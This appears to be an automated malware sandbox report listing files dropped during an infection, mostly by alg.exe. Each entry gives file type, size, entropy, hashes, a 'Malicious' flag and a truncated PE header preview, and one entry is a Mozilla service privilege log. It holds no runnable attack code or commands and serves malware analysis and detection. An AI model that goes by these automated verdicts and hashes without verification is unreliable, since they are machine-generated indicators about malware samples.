SHA-256: D1FA839544BFEE55ADC8BE235B54E4C9E36BA993D40FC4ABEC2E0A3CAF0059F5
SHA-512: 9998E8AF49790581338FD3E741CAE7A6DA28DFF3B9FC9B36EA666B61974D85F71D946D7E810D6462D87BB046261F23C284F88B69A9571C43F02950E4F2EAD45D
Malicious: true
Reputation: unknown

Process: C:\Windows\System32\alg.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1221120
Entropy (8bit): 5.1389142663427725
Encrypted: false
SSDEEP: 12288:EbrNRzB+NnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:EbBRzBgnsqjnhMgeiCl7G0nehbGZpbD
MD5: 1028B3273289A43728AB4219C5D3789F
SHA1: 8D78A7A5DF5F273DCFEF00F2DA787B74F71A48F6
SHA-256: 2A85A3FFEA0A1D3550D3CCABF73F54121EBD7F3D50AF1997FD6F04F0EC47AAF8
SHA-512: 064EA511CF7F548AF49C497D975D76E6935259015017CD7EAE3D968274A9FCE6DB5EEB398C45933022062C4FBA75B6C734A4CED2E6A551E9B1B2C31B0C6ACE3B
Malicious: true
Reputation: unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.............................................................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2168832
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.940561936119971
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:ay53w24gQu3TPZ2psFkiSqwoz9Dmg27RnWGj:ayFQgZqsFki+oz9D527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:75BE69AA06765D045784F3413C7A1283
                                                                                                                                                                                                                                                                                                                                                    SHA1:0410E537C902C5B802A86CDC58269D571D3A1DB3
                                                                                                                                                                                                                                                                                                                                                    SHA-256:D012359799B056215ABB0E9AEC8EAE5399F580502103C78302CD9E8385E2B91B
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C8F037498AAFB381CFB75884BC9C46A3B00E2D35082E2948B6805FCCFC07E1849FFFB6C8194AC4411741C14EDB15292BF0838F957FBBE474A0543FC4FB81368B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!......&!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3141
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.850184061793769
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:j5d85JEX8kkCRR0WtDr0WmIDVzVCmC8W0WqDjFgH0WlbD0W07DYMPE0WqNDUvkBA:VESR5Rm6w2q7J7qQ+znoD
                                                                                                                                                                                                                                                                                                                                                    MD5:2272A4746B3A2B07687B52C1167D37EA
                                                                                                                                                                                                                                                                                                                                                    SHA1:F1A55061E1D006561372B1A4539A2D36FE390647
                                                                                                                                                                                                                                                                                                                                                    SHA-256:E014C2A5A0E5FFE72E92E0336DE17ABDFFEC09B2C925A9F6F7BE63573F5799EE
                                                                                                                                                                                                                                                                                                                                                    SHA-512:3261A6339B67CD82CA5D838EA6BF9474B16E18EC029FCB80A605B94192459289F0B1A80438BA4B2A9C2A0CDB9220EE1A76436D015DA6136B46E634E6082E49FD
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-11-26 02:12:55-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-11-26 02:12:55-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-11-26 02:12:55-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-11-26 02:12:5
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3478365352125055
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:IQVTZu0J4sqjnhMgeiCl7G0nehbGZpbD:nVTZulDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:C00D0B962E95984AE63736DD9A6F990E
                                                                                                                                                                                                                                                                                                                                                    SHA1:73FC44314FFB66BA8AF89F180B3E1E073026633A
                                                                                                                                                                                                                                                                                                                                                    SHA-256:79B03D55F5C6D1E32307AB0722073A784A9FAF7CA920CE5A2E13BD2421F9C40D
                                                                                                                                                                                                                                                                                                                                                    SHA-512:E5AAF62F83B3676BF088279AF6661201A97E3276BEA5D30B4AB1C3DA17225740EE6A95EBB3EC710C9B4BC7649B9C952E355C56BB48361DC74086E940755D18D5
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P.......@.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.623138909448191
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:I+gkESfh4CoPsqjnhMgeiCl7G0nehbGZpbD:1gkE+SBDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:FCB682D162897B070B33D3E5FB7ACDBC
                                                                                                                                                                                                                                                                                                                                                    SHA1:A9D197E31A75470863CD1EBF6BA995CB08475958
                                                                                                                                                                                                                                                                                                                                                    SHA-256:DB7834B5A07CAFA9DC64A44E427EE18FE841F63626C3A413461664E3D74EC95A
                                                                                                                                                                                                                                                                                                                                                    SHA-512:5349DCC83D8E7CEDB0D0C9739512259C1C9640E1EA845EE71C9B17BD5BCDEA339300408CAA9C09D1F189857E4A63746B07C38FE5923647CAD34020C678D6705B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ...... ..... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1532416
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.096683679667781
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:hBpDRmi78gkPXlyo0GtjrgsqjnhMgeiCl7G0nehbGZpbD:zNRmi78gkPX4o0GtjQDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:0843BF107ABD82D3F92C3B1CDE3940E6
                                                                                                                                                                                                                                                                                                                                                    SHA1:24068E0CD34575DF6DAFBDABA954025ECDF8E796
                                                                                                                                                                                                                                                                                                                                                    SHA-256:43811783A15199D17954BBAB6AC8129A6757A326669F444D197F527D9B80A310
                                                                                                                                                                                                                                                                                                                                                    SHA-512:E2D81AFA1A889B28FE5DDFB9C16B5B8CD1C21ACC651D91E901D855D30D753D100FC92D5AD7C35B3BFEFBD7F3C221EDE906B0169637CF2F812640A30EE95B0243
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@......................................q.... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.229076912040957
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:bLOS2oTPIXVPsqjnhMgeiCl7G0nehbGZpbD:F/ToDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:96C3C0E4F3BFD19E719C75A3D2D32C10
                                                                                                                                                                                                                                                                                                                                                    SHA1:ACBDE3BC1F74344C7E8D146A9CFCFAD9667F6A40
                                                                                                                                                                                                                                                                                                                                                    SHA-256:5875CC7BDC07537FB0A7C0283EDD4F3E29EF254EB20EFC6AC6C195A206D70A68
                                                                                                                                                                                                                                                                                                                                                    SHA-512:6FD07C4EECAFA8EDBB898D3623FCB61E09E93B4AD100BC5CBFE0C84A484F3FACAB56C3D47400D02CC84020816CD514BE77FFA5C950AAFBBF5A7A101420009AC5
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@.....................................w..... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1145344
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0311944249469125
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:g19Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:g19sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:5FB3749B61772E11B3349EA3B0E4E441
                                                                                                                                                                                                                                                                                                                                                    SHA1:9FAF1FDC8981690934601CA284FE8F2E7B128FFE
                                                                                                                                                                                                                                                                                                                                                    SHA-256:F8F36A408E784A9577234B99AD070BA05DA6B6C8AFBDF0F2812F391BDE8F9E9C
                                                                                                                                                                                                                                                                                                                                                    SHA-512:ED844B79B5B7BC08FB48C51849AB2A614CB6DD5ECB0CC2963944DE0C26A4956B12B2087E0943889895C6740656CD2230A868121CCEC5DBBB2B86E1B97094D214
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1222656
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.712035436751787
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:WRudzGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:WAdzGsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:FE05A927F23E1DC691B6633853AB3CC3
                                                                                                                                                                                                                                                                                                                                                    SHA1:6E11ADF82971946FD6501CD5D01C29890A551DCC
                                                                                                                                                                                                                                                                                                                                                    SHA-256:B0358CCE865603277C22414A831052483D6D8B802B3283175653C18DC65198A7
                                                                                                                                                                                                                                                                                                                                                    SHA-512:0803462846E916BD9EA6A31C4D16DBD38CDCB9DA45BE64A9C421FF3788F739604E693E8DDBF66A955AD6653CFAF5EEC66E2835EFB5901CF3DF9153CF677BF5E0
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................A..... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1457664
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.082163502055599
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:MvCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:psqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:82D4ECBF4FD8551D16327A0701220E1F
                                                                                                                                                                                                                                                                                                                                                    SHA1:0D1D792AD808ADDCF651511CEC33E57EBDCD2868
                                                                                                                                                                                                                                                                                                                                                    SHA-256:F25E72D0BE5AE037A64B2EAC0365C4B910C11D290F91524490B024E1730D4B74
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C24C965C7A2FFF68670D49062BEC9730625CE7715445DCD215421406F33772A59AB94A57AEF479837CDA685FFE311CF48C584101562FA5BF2E7293256CB99AB2
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@.......................................... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1461248
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.468636563549038
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:d5zhM1XSEjsqjnhMgeiCl7G0nehbGZpbD:pMsKDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:3036FDCC06CFF626337221F199BEBDF9
                                                                                                                                                                                                                                                                                                                                                    SHA1:F7FD3789BDBB22E381DBEAF6BFE6F4EA7AFF6141
                                                                                                                                                                                                                                                                                                                                                    SHA-256:18E6A62FCA5251402D74651C047FBBAC9FA08CE9E8F45CE08D1122A8F22E8648
                                                                                                                                                                                                                                                                                                                                                    SHA-512:E5373515DAC99C15BF882324E7454AF9C33FC8849E1803D9E6164B1FD566D59FCD1704770D9AA440D5D59E5E78473EB0D756F2B949F597FDE3016ECA3B54AB86
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4151808
Entropy (8bit):6.499791701491194
Encrypted:false
SSDEEP:49152:ctuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755EDmg27RN:cjEIa4HIEWOc5OD527BWG
MD5:316E69E9269712E8847D951D4F9ED82C
SHA1:E0072BA1F34D674F747A89E56C59B3A4D6C4DE8C
SHA-256:4165AC1A17B1B4765933C95FD3892D4C3FF1BE205B2C09367A911C55F1A9E0FC
SHA-512:8F603200BF17986E83CF8E5BDE7D317CA2C0C069EAC20B635C84B2180189BA1275CC81F336F572E1654FCF4A7FB58F36B54BB55AB47D8D7FD1EC029DF282BF44
Malicious:true
Reputation:unknown

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59941376
Entropy (8bit):7.99936730764557
Encrypted:true
SSDEEP:1572864:EQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:7XhwMhe6AABPiQwF6xQ22R
MD5:4A2A509549FB5AA4151A27D864883DE3
SHA1:214C338B7325BF4827094A012E39B42740173EEA
SHA-256:D1996F48B02120D2478034B69AE26920B8B574E5D44FB8903AC3CFFBA545F92B
SHA-512:861C11A6593EB3725DB7574CBC2AB8CC8145CF47D2C65EF87C101F23BA7481CA32FE5317B252076DE63F938596711C9C8F4F33C699E2916ABFBB1AEF265354E5
Malicious:true
Reputation:unknown

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1180160
Entropy (8bit):5.084801589582246
Encrypted:false
SSDEEP:12288:kWyXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:kTsqjnhMgeiCl7G0nehbGZpbD
MD5:2D3BEF40A8DEC0753C9FD81FE09CCAEE
SHA1:5DF8E2686CD33AADBD634574C955DA09489E72F8
SHA-256:B244A34B9C54BAF5E87C1DF5C13C1248FF9D36927E485412EF34D4A83958C8A6
SHA-512:F2B88AB280FB3968516667ECDA53BE9DA7A393A694752A7CDF13ECEB78D09B5D7318ED32AECB97FBA4EB43F94F1E2492115E0D6F372319B03BD0C89E5B850F5F
Malicious:true
Reputation:unknown

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):6210048
Entropy (8bit):6.386711523045074
Encrypted:false
SSDEEP:49152:iDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXO:TnN9KfxLk6GEQTX5UKzNDZD527BWG
MD5:D1F0E05EF51AB299EFADFB366E4F33FA
SHA1:2758306C3ACA4C73B006A270308D2A41BE7FD15A
SHA-256:9A0B7A7735E41D4C6B1887EEF818323F42F5EE0719C4986276345FEAC977F1F9
SHA-512:6FD1637991A6E000881398428619CFB454E6CCC268914F94AF3F986395A6B10A1A6F27A1ACC90AE53397E293570608A4C2AC8A293506CAF4A0B39C613A01CF6A
Malicious:true
Reputation:unknown

Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1157120
Entropy (8bit):5.0414752757267385
Encrypted:false
SSDEEP:12288:27Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:27sqjnhMgeiCl7G0nehbGZpbD
MD5:7054C58211DB2494183184787FB0A8BD
SHA1:8638760276A202F619263D5CEF95ACA1CD33B1B2
SHA-256:57E3D9ADB287181E6760A0CA215C9060D5FFBCB1C13BF581AB66534EA4B446F0
SHA-512:FA4A301A6BA276CCADCFAE452BF72C83B89FA0581B5B42EB8E0415BBDE80FE0368293733A228281CF48A45D9BB830A437059C41A27CDFA4B7E5F1D9A71AAB625
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12039168
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.596681044642841
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:98304:sb+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgK0D527BWG:+nPgTHIwZoRBk9DdhSUEVIXgK0VQBWG
                                                                                                                                                                                                                                                                                                                                                    MD5:93E12BA7E8E47363FEF7DD1290224756
                                                                                                                                                                                                                                                                                                                                                    SHA1:10DE7292460418F1D4AECF4E96BADF934FC4CC7E
                                                                                                                                                                                                                                                                                                                                                    SHA-256:2C7F48F2A33EB6D30D044600AB85F7C3837A5040EAD9A05E2BCF4B640601C0B7
                                                                                                                                                                                                                                                                                                                                                    SHA-512:D49C1ACE001C0D39DDD0AA95DE4C85F7C7EF6E5E09C36EF91436B5E653DBA8B6579DCB190E43B3C9984A5BE3E3E35C9E62C4B5D56FA9E0E44D394AA6A301AE2D
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@....................................;..... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1322496
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.281818418116841
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:9g5FvCPusYsqjnhMgeiCl7G0nehbGZpbD:qftDDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:CD965CC4AFA08EC9DCA3CF5C7648BE15
                                                                                                                                                                                                                                                                                                                                                    SHA1:D26869EA3399CE1A11F693D3FA8B47127B124018
                                                                                                                                                                                                                                                                                                                                                    SHA-256:0E9899E8BC0D83B16252CF1854D2D2D51195EA32BF1E166B93A358C0A0E9CA9E
                                                                                                                                                                                                                                                                                                                                                    SHA-512:DC29D9E98641326C563B44B8E628831768852F0168B811C161D292888D3E8A4BCE1F57FBD56A7019FDCCAA60912C0C4B2325521EEB0103D4F174C464BED31FDD
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p............ .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1339904
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.208904595543995
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:yjKTIsAjFuvtIfmFthMaT5U8aChaeu+sqjnhMgeiCl7G0nehbGZpbD:yjIMmPh7TT79rDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:AB72D75877E347EE52B7FE15C8B0071E
                                                                                                                                                                                                                                                                                                                                                    SHA1:53654A4FA23DDFF4AC8DEBDDF13617E4C1845D42
                                                                                                                                                                                                                                                                                                                                                    SHA-256:6E68BF4F633FBB1B4CE4DF44924DE6AD243F03B2B9C54828AB79DDCD2AE22635
                                                                                                                                                                                                                                                                                                                                                    SHA-512:0AC3349AE31B34B4CFC0DFB2F413EFBF7EB3E5F454EEA827EE6BDF18743991F19226E5CA23CFD31F8DA17566137EADD74FCCCC8175358287112DB4465CBE3C71
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
